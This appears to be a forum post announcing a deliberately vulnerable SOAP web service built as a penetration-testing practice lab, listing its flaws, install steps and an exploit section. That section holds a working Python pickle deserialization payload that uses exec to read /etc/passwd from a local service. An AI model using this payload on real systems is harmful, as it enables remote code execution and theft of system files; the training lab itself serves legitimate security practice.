Erlik | Vulnerable Soap Service

WhiteHat · September 2, 2022, 9:01pm

Vulnerable-Soap-Service

Erlik - Vulnerable Soap Service

Tested - Kali 2022.1

Description

It is a vulnerable SOAP web service. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.

Features

It contains the following vulnerabilities.

-LFI

-SQL Injection

-Informaion Disclosure

-Command Inejction

-Brute Force

-Deserialization

Installation

git clone https://github.com/anil-yelken/Vulnerable-Soap-Service

cd Vulnerable-Soap-Service

sudo pip3 install requirements.txt

Usage

sudo python3 vulnerable_soap.py

Exploiting Vulnerabilities

Deserialization

Code:

github.com

anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_socket.py

import socket,pickle,builtins
HOST = "127.0.0.1"
PORT = 8001
class Pickle(object):
    def __reduce__(self):
        return (builtins.exec, ("with open('/etc/passwd','r') as files: print(files.readlines())",))
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
    sock.connect((HOST,PORT))
    sock.sendall(pickle.dumps(Pickle()))

github.com

anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_requests.py

from suds.client import Client
client = Client('http://127.0.0.1:8000/?wsdl')
print(client)
print(client.service.deserialization())

Friendly Websites

Erlik | Vulnerable Soap Service

Vulnerable-Soap-Service

Description

Features

Installation

Usage

Exploiting Vulnerabilities

LFI

SQL Injection

Informaion Disclosure

Command Injection

Brute Force

Deserialization

GitHub: